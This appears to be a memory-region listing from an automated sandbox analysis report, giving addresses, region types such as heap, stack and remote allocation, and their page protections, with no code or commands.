A749000
heap
page read and write
BBEC000
heap
page read and write
A6A2000
heap
page read and write
BA3F000
heap
page read and write
87C0000
heap
page read and write
B410000
remote allocation
page read and write
B9FB000
heap
page read and write
BB88000
heap
page read and write
87EB000
heap
page read and write
8894000
heap
page read and write
A76F000
heap
page read and write
7DF4F0F20000
trusted library allocation
page readonly
A640000
heap
page read and write
BAF8000
heap
page read and write
86A8000
heap
page read and write
A6A6000
heap
page read and write
A704000
heap
page read and write
B907000
heap
page read and write
ADA9000
heap
page read and write
4C7C000
heap
page read and write
284AAE00000
heap
page read and write
87F9000
heap
page read and write
4906000
heap
page read and write
869D000
heap
page read and write
8999000
heap
page read and write
B907000
heap
page read and write
A636000
heap
page read and write
85BB000
heap
page read and write
A66F000
heap
page read and write
C060000
trusted library allocation
page read and write
4B66000
heap
page read and write
B7D6000
heap
page read and write
C0DB000
stack
page read and write
A765000
heap
page read and write
A771000
heap
page read and write
B912000
heap
page read and write
8983000
heap
page read and write
8902000
heap
page read and write
31F6000
stack
page read and write
882B000
heap
page read and write
8973000
heap
page read and write
BA1D000
heap
page read and write
4BFE000
heap
page read and write
A76F000
heap
page read and write
BB33000
heap
page read and write
284B0491000
heap
page read and write
7DF4F0F71000
trusted library allocation
page execute read
BB88000
heap
page read and write
284B0456000
heap
page read and write
8804000
heap
page read and write
493B000
heap
page read and write
87E8000
heap
page read and write
284B0618000
trusted library allocation
page read and write
BB5B000
heap
page read and write
B951000
heap
page read and write
A7CE000
heap
page read and write
124E000
heap
page read and write
B697000
heap
page read and write
284B060E000
trusted library allocation
page read and write
8EA0000
heap
page read and write
BB45000
heap
page read and write
8894000
heap
page read and write
284B0664000
trusted library allocation
page read and write
88C2000
heap
page read and write
883D000
heap
page read and write
4C5E000
heap
page read and write
B685000
heap
page read and write
A68F000
heap
page read and write
893E000
heap
page read and write
B904000
heap
page read and write
E080000
heap
page read and write
B907000
heap
page read and write
A77C000
heap
page read and write
8931000
heap
page read and write
BAFB000
heap
page read and write
D60000
heap
page read and write
A77C000
heap
page read and write
88D6000
heap
page read and write
86ED000
heap
page read and write
4948000
heap
page read and write
BBEF000
heap
page read and write
B8D1000
heap
page read and write
B92F000
heap
page read and write
B68B000
heap
page read and write
B64B000
stack
page read and write
BADC000
heap
page read and write
A787AFE000
stack
page read and write
ADA0000
heap
page read and write
B980000
heap
page read and write
8965000
heap
page read and write
8843000
heap
page read and write
48EF000
heap
page read and write
284B03A0000
trusted library allocation
page read and write
2EBE000
stack
page read and write
BB5B000
heap
page read and write
4D0D000
heap
page read and write
B863000
heap
page read and write
87E8000
heap
page read and write
8714000
heap
page read and write
E41B000
stack
page read and write
B9B2000
heap
page read and write
BA52000
heap
page read and write
BBF6000
heap
page read and write
284B03A0000
trusted library allocation
page read and write
87FD000
heap
page read and write
BAF0000
heap
page read and write
B93A000
heap
page read and write
882B000
heap
page read and write
A765000
heap
page read and write
B693000
heap
page read and write
A77C000
heap
page read and write
BA32000
heap
page read and write
B907000
heap
page read and write
BB42000
heap
page read and write
284B0707000
trusted library allocation
page read and write
47C3000
heap
page read and write
A4CE000
stack
page read and write
ADAE000
heap
page read and write
7DF4F0F21000
trusted library allocation
page execute read
A68F000
heap
page read and write
BA52000
heap
page read and write
C030000
trusted library allocation
page read and write
BA21000
heap
page read and write
4CFB000
heap
page read and write
B907000
heap
page read and write
116E000
stack
page read and write
C020000
trusted library allocation
page read and write
8999000
heap
page read and write
A77C000
heap
page read and write
284B0600000
trusted library allocation
page read and write
A665000
heap
page read and write
A77C000
heap
page read and write
284B066F000
trusted library allocation
page read and write
87E8000
heap
page read and write
A644000
heap
page read and write
8099000
stack
page read and write
4902000
heap
page read and write
BA4E000
heap
page read and write
BC43000
heap
page read and write
87EB000
heap
page read and write
A5F2000
heap
page read and write
A788000
heap
page read and write
B5C9000
stack
page read and write
BB75000
heap
page read and write
BEF0000
trusted library allocation
page read and write
BA70000
heap
page read and write
BB11000
heap
page read and write
892E000
heap
page read and write
A669000
heap
page read and write
BB33000
heap
page read and write
BB8B000
heap
page read and write
7DF4F0F60000
trusted library allocation
page readonly
893E000
heap
page read and write
87F3000
heap
page read and write
87EB000
heap
page read and write
A771000
heap
page read and write
284AAE25000
heap
page read and write
A68F000
heap
page read and write
A749000
heap
page read and write
B931000
heap
page read and write
A77E000
heap
page read and write
BA59000
heap
page read and write
C090000
trusted library allocation
page read and write
898F000
heap
page read and write
A765000
heap
page read and write
284B0500000
heap
page read and write
A749000
heap
page read and write
A749000
heap
page read and write
284B06F1000
trusted library allocation
page read and write
85E4000
heap
page read and write
87EE000
heap
page read and write
A771000
heap
page read and write
A696000
heap
page read and write
880D000
heap
page read and write
DDA0000
trusted library allocation
page read and write
B65B000
heap
page read and write
BAFB000
heap
page read and write
488E000
heap
page read and write
284B0372000
trusted library allocation
page read and write
87F7000
heap
page read and write
C040000
trusted library allocation
page read and write
47B9000
heap
page read and write
B98B000
heap
page read and write
B410000
remote allocation
page read and write
A690000
heap
page read and write
8942000
heap
page read and write
284AAF00000
heap
page read and write
8798000
heap
page read and write
A788000
heap
page read and write
887E000
heap
page read and write
BA4B000
heap
page read and write
A771000
heap
page read and write
BAD7000
heap
page read and write
87FB000
heap
page read and write
BBEF000
heap
page read and write
87FB000
heap
page read and write
4BC4000
heap
page read and write
FD3000
heap
page read and write
887E000
heap
page read and write
8973000
heap
page read and write
A76F000
heap
page read and write
B9DA000
heap
page read and write
B951000
heap
page read and write
A7CE000
heap
page read and write
B91F000
heap
page read and write
B650000
heap
page read and write
BA4C000
heap
page read and write
BBB6000
heap
page read and write
B959000
heap
page read and write
8804000
heap
page read and write
BB88000
heap
page read and write
A77C000
heap
page read and write
A788000
heap
page read and write
BBCF000
heap
page read and write
BC02000
heap
page read and write
ADF6000
heap
page read and write
A68E000
heap
page read and write
A2BE000
stack
page read and write
85CB000
heap
page read and write
47B0000
heap
page read and write
BB53000
heap
page read and write
A77C000
heap
page read and write
B68D000
heap
page read and write
86C8000
heap
page read and write
A76F000
heap
page read and write
A6A2000
heap
page read and write
BB98000
heap
page read and write
B98E000
heap
page read and write
ADE3000
heap
page read and write
A1BD000
stack
page read and write
4C0C000
heap
page read and write
B98B000
heap
page read and write
B931000
heap
page read and write
E050000
trusted library allocation
page read and write
880D000
heap
page read and write
85E2000
heap
page read and write
B991000
heap
page read and write
B98B000
heap
page read and write
A749000
heap
page read and write
B6A7000
heap
page read and write
4B9E000
heap
page read and write
8999000
heap
page read and write
A77E000
heap
page read and write
A788000
heap
page read and write
DD80000
trusted library allocation
page read and write
A77E000
heap
page read and write
284AB704000
heap
page read and write
85E9000
heap
page read and write
8719000
heap
page read and write
87C0000
heap
page read and write
A762000
heap
page read and write
1240000
heap
page read and write
87EB000
heap
page read and write
8999000
heap
page read and write
A54F000
stack
page read and write
8973000
heap
page read and write
887E000
heap
page read and write
B9D7000
heap
page read and write
284AB702000
heap
page read and write
BB75000
heap
page read and write
BADA000
heap
page read and write
A7CE000
heap
page read and write
B667000
heap
page read and write
1244000
heap
page read and write
8966000
heap
page read and write
BB3E000
heap
page read and write
1270000
heap
page read and write
A704000
heap
page read and write
A77C000
heap
page read and write
8804000
heap
page read and write
7840000
trusted library section
page readonly
A6A2000
heap
page read and write
A77C000
heap
page read and write
BB8C000
heap
page read and write
B67F000
heap
page read and write
B05000
stack
page read and write
882B000
heap
page read and write
8714000
heap
page read and write
B410000
remote allocation
page read and write
86A6000
heap
page read and write
87FB000
heap
page read and write
284B0700000
remote allocation
page read and write
87EB000
heap
page read and write
883C000
heap
page read and write
A762000
heap
page read and write
BB33000
heap
page read and write
284B0390000
trusted library allocation
page read and write
85E2000
heap
page read and write
A77C000
heap
page read and write
88C2000
heap
page read and write
A749000
heap
page read and write
882B000
heap
page read and write
BA1B000
heap
page read and write
A765000
heap
page read and write
BA2F000
heap
page read and write
8891000
heap
page read and write
7BFC000
stack
page read and write
BB45000
heap
page read and write
BB0D000
heap
page read and write
13B0000
heap
page read and write
85E9000
heap
page read and write
86A6000
heap
page read and write
E39F000
stack
page read and write
BB0F000
heap
page read and write
284B1000000
heap
page read and write
A76F000
heap
page read and write
A771000
heap
page read and write
A7CE000
heap
page read and write
87F5000
heap
page read and write
8804000
heap
page read and write
893E000
heap
page read and write
284B050A000
heap
page read and write
ADBC000
heap
page read and write
A787E7E000
stack
page read and write
8798000
heap
page read and write
5530000
trusted library section
page read and write
87EE000
heap
page read and write
BB0D000
heap
page read and write
4C3F000
heap
page read and write
C060000
trusted library allocation
page read and write
B8E1000
heap
page read and write
A78847B000
stack
page read and write
A788000
heap
page read and write
48D4000
heap
page read and write
883D000
heap
page read and write
2A60000
trusted library allocation
page read and write
E0A0000
heap
page read and write
896D000
heap
page read and write
B9DA000
heap
page read and write
99C0000
heap
page read and write
BA23000
heap
page read and write
8999000
heap
page read and write
B658000
heap
page read and write
B888000
heap
page read and write
BBA7000
heap
page read and write
A5D0000
heap
page read and write
B9FA000
heap
page read and write
B951000
heap
page read and write
4CDC000
heap
page read and write
A749000
heap
page read and write
125D000
heap
page read and write
BBFB000
heap
page read and write
4948000
heap
page read and write
29DE000
stack
page read and write
B9DE000
heap
page read and write
493B000
heap
page read and write
BB3E000
heap
page read and write
A762000
heap
page read and write
C300000
trusted library allocation
page read and write
BAD7000
heap
page read and write
A771000
heap
page read and write
BAE8000
heap
page read and write
284B0360000
trusted library allocation
page read and write
86B8000
heap
page read and write
4C43000
heap
page read and write
BB75000
heap
page read and write
284B06E8000
trusted library allocation
page read and write
A7CE000
heap
page read and write
BA9A000
heap
page read and write
4960000
heap
page read and write
BAD7000
heap
page read and write
BADA000
heap
page read and write
865C000
heap
page read and write
893E000
heap
page read and write
BB51000
heap
page read and write
7685000
stack
page read and write
B884000
heap
page read and write
4C6A000
heap
page read and write
BADC000
heap
page read and write
887E000
heap
page read and write
284B04F9000
heap
page read and write
48F2000
heap
page read and write
A669000
heap
page read and write
85D2000
heap
page read and write
A6A6000
heap
page read and write
47F3000
heap
page read and write
87BB000
heap
page read and write
4C51000
heap
page read and write
A788000
heap
page read and write
87EE000
heap
page read and write
8944000
heap
page read and write
284AAEA8000
heap
page read and write
7CFE000
stack
page read and write
BB51000
heap
page read and write
284B06F4000
trusted library allocation
page read and write
890F000
heap
page read and write
BB42000
heap
page read and write
8727000
heap
page read and write
A696000
heap
page read and write
B681000
heap
page read and write
4C4B000
heap
page read and write
A749000
heap
page read and write
BAF3000
heap
page read and write
AD50000
heap
page read and write
87F9000
heap
page read and write
284B0690000
trusted library allocation
page read and write
BC0E000
heap
page read and write
1271000
heap
page read and write
A704000
heap
page read and write
31F0000
stack
page read and write
B699000
heap
page read and write
887E000
heap
page read and write
7DF4F0F31000
trusted library allocation
page execute read
A76F000
heap
page read and write
B951000
heap
page read and write
A5F6000
heap
page read and write
B959000
heap
page read and write
BBAC000
heap
page read and write
BB45000
heap
page read and write
284AB602000
heap
page read and write
A788000
heap
page read and write
48E3000
heap
page read and write
BB3E000
heap
page read and write
87F3000
heap
page read and write
8617000
heap
page read and write
A704000
heap
page read and write
87C0000
heap
page read and write
BB8F000
heap
page read and write
A7CE000
heap
page read and write
BB1D000
heap
page read and write
B84D000
heap
page read and write
BA52000
heap
page read and write
87C0000
heap
page read and write
898F000
heap
page read and write
896D000
heap
page read and write
A749000
heap
page read and write
4906000
heap
page read and write
B66D000
heap
page read and write
284AAF13000
heap
page read and write
8916000
heap
page read and write
284ABE20000
trusted library allocation
page read and write
87E8000
heap
page read and write
8804000
heap
page read and write
284B04C5000
heap
page read and write
A749000
heap
page read and write
BAFB000
heap
page read and write
87EB000
heap
page read and write
7DF4F0F31000
trusted library allocation
page execute read
A77E000
heap
page read and write
284AAF02000
heap
page read and write
A749000
heap
page read and write
7DB0000
heap
page read and write
284B0513000
heap
page read and write
284B0502000
heap
page read and write
87E0000
heap
page read and write
284AB600000
heap
page read and write
284AAE7E000
heap
page read and write
4AC0000
trusted library allocation
page read and write
87FB000
heap
page read and write
BA31000
heap
page read and write
A771000
heap
page read and write
893E000
heap
page read and write
BAEB000
heap
page read and write
8EA6000
heap
page read and write
ADD3000
heap
page read and write
B48B000
stack
page read and write
284B06C2000
trusted library allocation
page read and write
8617000
heap
page read and write
284B04F2000
heap
page read and write
BA1B000
heap
page read and write
BB66000
heap
page read and write
898F000
heap
page read and write
A669000
heap
page read and write
A68B000
heap
page read and write
E21A000
heap
page read and write
A704000
heap
page read and write
BB0F000
heap
page read and write
B951000
heap
page read and write
ADE3000
heap
page read and write
8894000
heap
page read and write
A669000
heap
page read and write
BB66000
heap
page read and write
A653000
heap
page read and write
B951000
heap
page read and write
BAF0000
heap
page read and write
C15D000
stack
page read and write
A65F000
heap
page read and write
A68B000
heap
page read and write
88D6000
heap
page read and write
880D000
heap
page read and write
284B0340000
trusted library allocation
page read and write
B98B000
heap
page read and write
A771000
heap
page read and write
87F7000
heap
page read and write
BA3E000
heap
page read and write
A77E000
heap
page read and write
8894000
heap
page read and write
BC43000
heap
page read and write
DD93000
trusted library allocation
page read and write
B849000
heap
page read and write
B98E000
heap
page read and write
E1D3000
trusted library allocation
page read and write
BACB000
heap
page read and write
D7BD000
stack
page read and write
8804000
heap
page read and write
B8D2000
heap
page read and write
B931000
heap
page read and write
4898000
heap
page read and write
ADDA000
heap
page read and write
87F3000
heap
page read and write
284B0450000
heap
page read and write
88D6000
heap
page read and write
284AAE59000
heap
page read and write
B68F000
heap
page read and write
88D6000
heap
page read and write
B9B2000
heap
page read and write
85E7000
heap
page read and write
A77C000
heap
page read and write
BA4C000
heap
page read and write
BBEF000
heap
page read and write
A788000
heap
page read and write
ADFB000
heap
page read and write
A68F000
heap
page read and write
C2DB000
stack
page read and write
7DF4F0F31000
trusted library allocation
page execute read
87FD000
heap
page read and write
BA5E000
heap
page read and write
284B042C000
heap
page read and write
B8DC000
heap
page read and write
A659000
heap
page read and write
A76F000
heap
page read and write
A762000
heap
page read and write
8973000
heap
page read and write
8EA6000
heap
page read and write
A23D000
stack
page read and write
B959000
heap
page read and write
A65B000
heap
page read and write
A771000
heap
page read and write
8019000
stack
page read and write
85E6000
heap
page read and write
A5DE000
heap
page read and write
A77E000
heap
page read and write
4B54000
heap
page read and write
BB14000
heap
page read and write
887E000
heap
page read and write
A641000
heap
page read and write
284AC2A1000
trusted library allocation
page read and write
1380000
remote allocation
page read and write
11F9000
heap
page read and write
A77E000
heap
page read and write
87FD000
heap
page read and write
BB66000
heap
page read and write
BBEC000
heap
page read and write
87F5000
heap
page read and write
284AAF17000
heap
page read and write
48D4000
heap
page read and write
BAF0000
heap
page read and write
BBCE000
heap
page read and write
284AAF00000
heap
page read and write
A66F000
heap
page read and write
BA67000
heap
page read and write
B931000
heap
page read and write
8602000
heap
page read and write
BA1F000
heap
page read and write
4B4C000
heap
page read and write
87F9000
heap
page read and write
E1E0000
trusted library allocation
page read and write
BB53000
heap
page read and write
87EE000
heap
page read and write
4AD0000
trusted library allocation
page read and write
B8CC000
heap
page read and write
FB0000
heap
page read and write
88D6000
heap
page read and write
4C34000
heap
page read and write
284B0700000
remote allocation
page read and write
A77C000
heap
page read and write
BB1D000
heap
page read and write
87EB000
heap
page read and write
1275000
heap
page read and write
4BE8000
heap
page read and write
B1CE000
stack
page read and write
B679000
heap
page read and write
A76F000
heap
page read and write
85FD000
heap
page read and write
284AAE79000
heap
page read and write
A787C77000
stack
page read and write
A600000
heap
page read and write
A749000
heap
page read and write
A6A6000
heap
page read and write
87F5000
heap
page read and write
BBF6000
heap
page read and write
2F36000
stack
page read and write
B789000
heap
page read and write
A765000
heap
page read and write
284AAD80000
heap
page read and write
8944000
heap
page read and write
8942000
heap
page read and write
8978000
heap
page read and write
C010000
heap
page readonly
497F000
heap
page read and write
A687000
heap
page read and write
88D6000
heap
page read and write
88FB000
heap
page read and write
47CA000
heap
page read and write
A6A2000
heap
page read and write
B918000
heap
page read and write
284AAE43000
heap
page read and write
284B03F0000
trusted library allocation
page read and write
C070000
trusted library allocation
page read and write
8973000
heap
page read and write
A76F000
heap
page read and write
7C7E000
stack
page read and write
284B042A000
heap
page read and write
A77C000
heap
page read and write
284B06B0000
trusted library allocation
page read and write
B849000
heap
page read and write
A7CE000
heap
page read and write
DB38000
stack
page read and write
BB42000
heap
page read and write
B8DC000
heap
page read and write
BB51000
heap
page read and write
BAFB000
heap
page read and write
BBC0000
heap
page read and write
A7CE000
heap
page read and write
136C000
stack
page read and write
A765000
heap
page read and write
8894000
heap
page read and write
B9FE000
heap
page read and write
B959000
heap
page read and write
B991000
heap
page read and write
8944000
heap
page read and write
284AB71A000
heap
page read and write
A6A6000
heap
page read and write
BAE9000
heap
page read and write
BBCE000
heap
page read and write
87E0000
heap
page read and write
88D6000
heap
page read and write
88F3000
heap
page read and write
1170000
heap
page read and write
8727000
heap
page read and write
4BEE000
heap
page read and write
ADC1000
heap
page read and write
BB94000
heap
page read and write
BA4C000
heap
page read and write
284B02D0000
trusted library allocation
page read and write
87FB000
heap
page read and write
88C2000
heap
page read and write
B951000
heap
page read and write
B98B000
heap
page read and write
85E6000
heap
page read and write
B959000
heap
page read and write
4B38000
heap
page read and write
B98B000
heap
page read and write
B991000
heap
page read and write
C023000
trusted library allocation
page read and write
A62A000
heap
page read and write
284B044A000
heap
page read and write
BAF0000
heap
page read and write
88D6000
heap
page read and write
BB53000
heap
page read and write
7DF4F0F31000
trusted library allocation
page execute read
8918000
heap
page read and write
87E0000
heap
page read and write
284B04EE000
heap
page read and write
BA21000
heap
page read and write
8850000
heap
page read and write
A7CE000
heap
page read and write
87F9000
heap
page read and write
B9A1000
heap
page read and write
86C8000
heap
page read and write
4C10000
heap
page read and write
A788A7C000
stack
page read and write
BB5B000
heap
page read and write
B98E000
heap
page read and write
A771000
heap
page read and write
4972000
heap
page read and write
A788000
heap
page read and write
883D000
heap
page read and write
284B0370000
trusted library allocation
page read and write
284B0350000
trusted library allocation
page read and write
8617000
heap
page read and write
BBCF000
heap
page read and write
8983000
heap
page read and write
BB47000
heap
page read and write
493B000
heap
page read and write
A787D7E000
unkown
page readonly
13B5000
heap
page read and write
A771000
heap
page read and write
126C000
heap
page read and write
A7CE000
heap
page read and write
8894000
heap
page read and write
FB9000
heap
page read and write
87F5000
heap
page read and write
A788000
heap
page read and write
BB75000
heap
page read and write
A78857E000
unkown
page readonly
887E000
heap
page read and write
A655000
heap
page read and write
A7CE000
heap
page read and write
8983000
heap
page read and write
861B000
heap
page read and write
887E000
heap
page read and write
A65F000
heap
page read and write
A76F000
heap
page read and write
E0BB000
heap
page read and write
A704000
heap
page read and write
A704000
heap
page read and write
47B3000
heap
page read and write
887E000
heap
page read and write
8920000
heap
page read and write
A762000
heap
page read and write
BB98000
heap
page read and write
BB33000
heap
page read and write
B907000
heap
page read and write
887E000
heap
page read and write
893E000
heap
page read and write
47C1000
heap
page read and write
880D000
heap
page read and write
B9FE000
heap
page read and write
A6A2000
heap
page read and write
284AB713000
heap
page read and write
B991000
heap
page read and write
A749000
heap
page read and write
ADBD000
heap
page read and write
A696000
heap
page read and write
8973000
heap
page read and write
A762000
heap
page read and write
882B000
heap
page read and write
85D2000
heap
page read and write
87EB000
heap
page read and write
284AAF06000
heap
page read and write
BBCE000
heap
page read and write
A76F000
heap
page read and write
B959000
heap
page read and write
BB88000
heap
page read and write
A76F000
heap
page read and write
284B04CD000
heap
page read and write
7AB7000
stack
page read and write
85E4000
heap
page read and write
4C57000
heap
page read and write
B980000
heap
page read and write
284AAE94000
heap
page read and write
883D000
heap
page read and write
BB75000
heap
page read and write
A704000
heap
page read and write
BB45000
heap
page read and write
887E000
heap
page read and write
B9B8000
heap
page read and write
A765000
heap
page read and write
A7897FE000
stack
page read and write
284AADE0000
trusted library allocation
page read and write
88C0000
heap
page read and write
87FD000
heap
page read and write
898F000
heap
page read and write
85E6000
heap
page read and write
8798000
heap
page read and write
B9DA000
heap
page read and write
8983000
heap
page read and write
BBEF000
heap
page read and write
A704000
heap
page read and write
A704000
heap
page read and write
A765000
heap
page read and write
8942000
heap
page read and write
A76F000
heap
page read and write
284B0656000
trusted library allocation
page read and write
86AA000
heap
page read and write
BBAC000
heap
page read and write
ADC5000
heap
page read and write
7DF4F0F40000
trusted library allocation
page readonly
A76F000
heap
page read and write
284AAF02000
heap
page read and write
284B04AF000
heap
page read and write
BB53000
heap
page read and write
4906000
heap
page read and write
4948000
heap
page read and write
3340000
heap
page read and write
B931000
heap
page read and write
4960000
heap
page read and write
BAF8000
heap
page read and write
87F3000
heap
page read and write
8942000
heap
page read and write
A7876BC000
stack
page read and write
C020000
trusted library allocation
page read and write
87E0000
heap
page read and write
8894000
heap
page read and write
4C03000
heap
page read and write
88D6000
heap
page read and write
BADA000
heap
page read and write
BB97000
heap
page read and write
47BD000
heap
page read and write
BBCE000
heap
page read and write
BA9A000
heap
page read and write
A76F000
heap
page read and write
87EE000
heap
page read and write
8659000
heap
page read and write
8685000
heap
page read and write
E0B8000
heap
page read and write
284B0691000
trusted library allocation
page read and write
7DF4F0F61000
trusted library allocation
page execute read
BAE0000
heap
page read and write
1380000
remote allocation
page read and write
A650000
heap
page read and write
B959000
heap
page read and write
BC02000
heap
page read and write
87EE000
heap
page read and write
B931000
heap
page read and write
A77E000
heap
page read and write
284AAE74000
heap
page read and write
4BA8000
heap
page read and write
882B000
heap
page read and write
8978000
heap
page read and write
92E8000
stack
page read and write
882B000
heap
page read and write
A6A2000
heap
page read and write
BA64000
heap
page read and write
B854000
heap
page read and write
BB42000
heap
page read and write
C000000
trusted library allocation
page read and write
AD96000
heap
page read and write
7DF4F0F20000
trusted library allocation
page readonly
4BA2000
heap
page read and write
87F3000
heap
page read and write
284AB700000
heap
page read and write
8934000
heap
page read and write
BB90000
heap
page read and write
284AAE13000
heap
page read and write
893E000
heap
page read and write
87E0000
heap
page read and write
49A5000
heap
page read and write
C88C000
stack
page read and write
87F9000
heap
page read and write
85C1000
heap
page read and write
ADF1000
heap
page read and write
A749000
heap
page read and write
B9DA000
heap
page read and write
B991000
heap
page read and write
A68B000
heap
page read and write
BBCE000
heap
page read and write
103F000
heap
page read and write
BA1B000
heap
page read and write
A66F000
heap
page read and write
BBC0000
heap
page read and write
B951000
heap
page read and write
4960000
heap
page read and write
BB53000
heap
page read and write
86B8000
heap
page read and write
A68F000
heap
page read and write
E0B4000
heap
page read and write
BBEF000
heap
page read and write
284AB615000
heap
page read and write
8804000
heap
page read and write
883C000
heap
page read and write
B840000
heap
page read and write
A6A2000
heap
page read and write
A7CE000
heap
page read and write
284B04C3000
heap
page read and write
BA30000
heap
page read and write
4935000
heap
page read and write
B884000
heap
page read and write
BB8B000
heap
page read and write
10D0000
heap
page read and write
8614000
heap
page read and write
496E000
heap
page read and write
DABD000
stack
page read and write
8804000
heap
page read and write
BB42000
heap
page read and write
284AAE2B000
heap
page read and write
E1D0000
trusted library allocation
page read and write
88D6000
heap
page read and write
7DF4F0F21000
trusted library allocation
page execute read
87F7000
heap
page read and write
BA23000
heap
page read and write
4B10000
heap
page read and write
8727000
heap
page read and write
894A000
heap
page read and write
DD80000
trusted library allocation
page read and write
87F3000
heap
page read and write
BB0D000
heap
page read and write
BAF8000
heap
page read and write
127A000
heap
page read and write
A6A6000
heap
page read and write
A696000
heap
page read and write
C050000
heap
page read and write
2BDE000
stack
page read and write
284AC2D0000
trusted library allocation
page read and write
87FD000
heap
page read and write
87EB000
heap
page read and write
85E9000
heap
page read and write
B931000
heap
page read and write
86E7000
heap
page read and write
882B000
heap
page read and write
87E0000
heap
page read and write
A78987E000
unkown
page readonly
BB92000
heap
page read and write
8999000
heap
page read and write
880D000
heap
page read and write
A78807E000
stack
page readonly
4C2F000
heap
page read and write
A647000
heap
page read and write
87E0000
heap
page read and write
2A70000
heap
page read and write
B9DA000
heap
page read and write
284AB990000
trusted library allocation
page read and write
87F9000
heap
page read and write
BA27000
heap
page read and write
4CF7000
heap
page read and write
A704000
heap
page read and write
87FD000
heap
page read and write
896F000
heap
page read and write
A788000
heap
page read and write
ADDB000
heap
page read and write
8798000
heap
page read and write
85E0000
heap
page read and write
BB0B000
heap
page read and write
B692000
heap
page read and write
BA3E000
heap
page read and write
A63E000
heap
page read and write
A762000
heap
page read and write
8791000
heap
page read and write
87E8000
heap
page read and write
8789000
heap
page read and write
4B52000
heap
page read and write
8978000
heap
page read and write
284B04E3000
heap
page read and write
A6A6000
heap
page read and write
284B0672000
trusted library allocation
page read and write
A68B000
heap
page read and write
A660000
heap
page read and write
883D000
heap
page read and write
284B03D0000
trusted library allocation
page read and write
B530000
unkown
page readonly
48D9000
heap
page read and write
DD80000
trusted library allocation
page read and write
A5FB000
heap
page read and write
A78837E000
unkown
page readonly
5540000
trusted library section
page read and write
85C5000
heap
page read and write
BB5B000
heap
page read and write
BA4E000
heap
page read and write
BA23000
heap
page read and write
A665000
heap
page read and write
BBA7000
heap
page read and write
8944000
heap
page read and write
88F7000
heap
page read and write
4B3B000
heap
page read and write
There are 1441 hidden memdumps, click here to show them.